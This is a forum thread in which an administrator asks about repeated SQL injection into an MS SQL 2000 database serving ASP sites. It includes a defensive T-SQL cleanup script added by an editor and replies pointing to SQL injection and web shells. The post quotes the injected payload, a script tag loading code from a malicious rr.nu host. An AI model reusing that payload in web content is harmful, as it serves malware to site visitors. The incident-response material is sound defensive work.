SQL Server
wlastas, 2012-10-09 00:20:43

Hacking MS SQL 2000sp4 database

There is a Windows Server 2003 Enterprise SP2 server standing in a rack at the data center,
running MS SQL Server 2000 SP4 + all automatic updates from Windows Update.
Built-in services are up: IIS + ftp + smtp + dns.
The built-in firewall is enabled, with 4 ports open:
dns tcp/udp 53
ftp 21
http 80
terminal 3389

About 20 sites are hosted on the server, with total traffic of up to 4 thousand visitors per day.
Most sites use a management system written in ASP (VBScript) over 10 years ago.
Code proven over the years, debugged until bug-free.
The server in its current configuration has been running without incident for more than 4 years.

3 days ago, attackers made changes to the SQL databases: of the 6 databases available, changes were made in only 1, the one that serves the most visited sites.
In all tables, in all text columns, in every row, the following code was added in front of the real content:
"> </title><script src="http://tenin58gaccel.rr.nu/sl.php?v=3"></script><!--
As a result, since even the page titles were taken from the SQL database, none of the sites worked, because they tried to download a virus and were blocked by antivirus.

What I did.
I changed the administrator password, although it does not seem to have been guessed,
because judging by the logs, the only successful logins to the system were through the terminal, and only at the times when I logged in.
I checked which files have been added to the system or modified since the hack - nothing
suspicious. Kaspersky (with up-to-date databases) also found nothing.
A search of all text files for tenin58gaccel also gave nothing - I thought perhaps they had placed the code that updates the database in one of the ASP files.
Reinstalled SQL Server with a new SA password, + SP4 + Security Update for SQL Server 2000 Service Pack 4 (KB983812).
Added 1 account for access to the SQL server from the program code - with a new password.
Checked the firewall rules.
Checked all the procedures and queries built into the databases - nothing new or hostile.

The measures taken did not help: over the past 2 days the database has been modified 3 more times, and now
the link to the virus is added to only one table, so it is loaded only from those pages that have captions for pictures.

A Google search for rr.nu/sl.php?v=3 (the third-level domain in the link changes with each new modification of the database)
turns up a pile of sites that have suffered a similar attack.

The question is: maybe someone knows what this is and how to deal with it?
Tell me how to find out where the security hole is and how to fix it - this is the first time I have encountered
a problem like this ((
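As an added example (not part of the original post), a T-SQL script for SQL Server 2000 that does inside the database what the post did by hand with a text search: it walks every char/varchar/nchar/nvarchar/text/ntext column of every user table, counts the rows that contain the invariant part of the injected tag (rr.nu/sl.php?v=3, since the third-level domain changes with each modification), and, with @do_clean set to 1, strips the injected prefix, which per the post always ends in </script><!--. It assumes the prefix sits at the start of the value (possibly stacked several times, one per modification), that no legitimate content contains </script><!--, and that a full backup has been taken first; text/ntext columns are only reported, because SQL 2000 cannot rewrite them with SUBSTRING in an UPDATE.

```sql
-- Added example (not from the original post). Run in the affected database on
-- SQL Server 2000: report, and optionally clean, every text-typed column that
-- carries the injected <script> tag. Take a full backup first.
SET NOCOUNT ON

DECLARE @do_clean bit
SET @do_clean = 0                      -- 0 = report only, 1 = rewrite infected rows

-- Invariant part of the injected tag (the third-level domain changes each time)
-- and the fragment that ends the injected prefix, both as quoted in the post.
-- varchar on purpose: it compares cleanly against both text and ntext columns.
DECLARE @marker varchar(100), @tail varchar(50)
SET @marker = '%rr.nu/sl.php?v=3%'
SET @tail   = '</script><!--'

DECLARE @schema sysname, @table sysname, @column sysname, @type sysname
DECLARE @obj nvarchar(300), @sql nvarchar(4000), @hits int, @rc int

DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext')

OPEN cols
FETCH NEXT FROM cols INTO @schema, @table, @column, @type
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @obj = QUOTENAME(@schema) + N'.' + QUOTENAME(@table)

    -- How many rows of this column still carry the tag? LIKE works on text/ntext too.
    SET @sql = N'SELECT @hits = COUNT(*) FROM ' + @obj
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE @marker'
    EXEC sp_executesql @sql, N'@marker varchar(100), @hits int OUTPUT', @marker, @hits OUTPUT

    IF @hits > 0
    BEGIN
        PRINT @obj + N'.' + QUOTENAME(@column) + N' (' + @type + N'): '
            + CAST(@hits AS nvarchar(10)) + N' infected row(s)'

        -- text/ntext cannot be rewritten with SUBSTRING in an UPDATE on SQL 2000
        -- (that needs UPDATETEXT), so those columns are reported but left alone.
        IF @do_clean = 1 AND @type IN ('char', 'varchar', 'nchar', 'nvarchar')
        BEGIN
            -- Drop everything up to and including the closing "</script><!--".
            -- Loop until nothing matches: a row hit three times carries three
            -- stacked prefixes, and each pass removes the outermost one.
            SET @sql = N'UPDATE ' + @obj + N' SET ' + QUOTENAME(@column)
                     + N' = SUBSTRING(' + QUOTENAME(@column) + N', CHARINDEX(@tail, '
                     + QUOTENAME(@column) + N') + LEN(@tail), 8000)'
                     + N' WHERE ' + QUOTENAME(@column) + N' LIKE @marker'
                     + N' AND CHARINDEX(@tail, ' + QUOTENAME(@column) + N') > 0; '
                     + N'SET @rc = @@ROWCOUNT'
            SET @rc = 1
            WHILE @rc > 0
                EXEC sp_executesql @sql,
                     N'@marker varchar(100), @tail varchar(50), @rc int OUTPUT',
                     @marker, @tail, @rc OUTPUT
        END
    END
    FETCH NEXT FROM cols INTO @schema, @table, @column, @type
END
CLOSE cols
DEALLOCATE cols
```

Run it once with @do_clean = 0 and compare the reported table/column list with what the sites actually render: the table that the post says now receives the link on its own (the one holding picture captions) should show up, and whichever table the CMS writes to from a public form is the first place to look for the injection point. Cleaning without closing that hole only buys a few hours, as the post's own timeline shows.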

2 answer(s)
korishxp, 2012-10-09
@korishxp

Judging by the description, the attacker acts through SQL injection on one of the sites: by uploading a shell to the site, editing the data in the SQL database, and then removing the shell from your site. I recommend checking all your sites with a WVS scanner and fixing all the vulnerabilities on your sites.

wlastas, 2012-10-09
@wlastas

I have never dealt with SQL injection.
As far as I understand, the attacker sends, from a form on one of the sites, some code that modifies a legitimate update/insert. So it should be enough to temporarily disable the ability to write to the database by cutting the rights of the user that is used to connect to the database and, when the exception is triggered, log all attempts by writing out the content sent from the form. Will it work?
